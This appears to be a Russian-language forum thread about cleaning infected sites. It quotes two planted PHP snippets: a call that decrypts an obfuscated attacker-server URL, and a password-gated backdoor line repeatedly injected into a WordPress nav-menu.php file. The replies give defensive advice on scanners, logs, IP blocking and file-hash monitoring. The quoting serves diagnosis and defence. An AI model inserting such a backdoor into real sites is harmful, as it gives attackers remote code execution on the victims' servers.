Follow along with the video below to see how to install our site as a web app on your home screen.
Примечание: This feature may not be available in some browsers.
Айболит вообще фигня, ядро шелла и прочее легко переписать.После айболита касперский находил левый код, а после касперского cureit еще находил. Так что - качайте сайт себе на машину и проверьте с cureit (утилита от dr.web)
Код:671 $url = decrypt_url('a3d3czksLDI3Ny0xMDAtNTotOzAsYW9sZCw8c3ZuYiV2d25ccGx2cWBmPjE3MzQyOTQxMzo2MjkyOzs0');
Так и есть, но как красиво это сделано...Ваш сайт взаимодействует с сервером злоумышленника который зашифрован в строке 671
Скрытое содержимое доступно для зарегистрированных пользователей!
Помогите пожалуйста найти причину, как кому-то удаётся постоянно перезаписать nav-menu.php. Установил Firewall и плагин от Sucuri.net, но файл периодически всё равно перезаписывается и туда добавляется вот такой код:
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
Смотрели скорее всего верно, только надо учесть, что логи могут архивироваться...@latteo А в каких логах нужно искать, на сервере хостера есть access_log и error_log и там и там смотрел, но подобной строчки не нашёл. Какого рода ошибка или запись должна быть?..
Это почти анрил, можно добавлять IP адреса злоумышленника в фаервол вашего хостинга, если у него есть такая услуга или у вас VPS, можно в .htaccess (на форуме уже много тем по этому вопросу)@latteo А как запретить любые соединения с адресом злоумышленника?
Погуглите md5 проверка изменений, у меня под рукой нет готового алгоритма, а суть в том что стандартными утилитами linux можно отслеживать изменения файлов и оперативно реагировать на вмешательство.Как я понял невозможно запустить какое-то приложение, которое бы отслеживало все изменения, единственный способ это анализ логов, верно?..
Большое спасибо за идею. Действительно можно собрать хеши всех файлов и далее смотреть, что изменилось и как и в какое время. По поводу вордпреса вы правы. Сейчас как раз смотрю, что из коммерческих вещей более менее может защитить. Смотрю в сторону ninja firewallСмотрели скорее всего верно, только надо учесть, что логи могут архивироваться...
Возможно так же что хакер не настроил отслеживание и таких запросов действительно нет. Хотя во всех чистках где я принимал участие такое было.
Это почти анрил, можно добавлять IP адреса злоумышленника в фаервол вашего хостинга, если у него есть такая услуга или у вас VPS, можно в .htaccess (на форуме уже много тем по этому вопросу)
Но обходится это довольно легко через прокси, причем прокси могут поднимать на зараженных сайтах.
Погуглите md5 проверка изменений, у меня под рукой нет готового алгоритма, а суть в том что стандартными утилитами linux можно отслеживать изменения файлов и оперативно реагировать на вмешательство.
Иногда это идёт как плагин в панели хостера, но видел я такое только у зарубежных хостеров.
Для повышения спокойствия можно попробовать пожить без плагинов (удалить физически) и поставив последнюю версию WP. Но вообще движок мегапопулярен и ломают его часто...
Пожалуйста, если поставишь, то скрипт лучше запрятать глубоко, что-бы снизить вероятность его нахождения, благо, это легко сделать, всего-то 1 файл, и переименовать можно, на крон поставить, к примеру каждый 30-60 мин. тестировать, это полезно не только для быстрой реакции против взлома, но и для сверки логов сервера со временем обнаружения взлома, по нему можно вычислить IP , если не со своей страны, например всякие прокси и прочее, то можно сразу в блеклист брандмауэра внести, в другом случае, если серьезно, заявление провайдеру или в полицию.А вот это то, что нужно! Спасибо!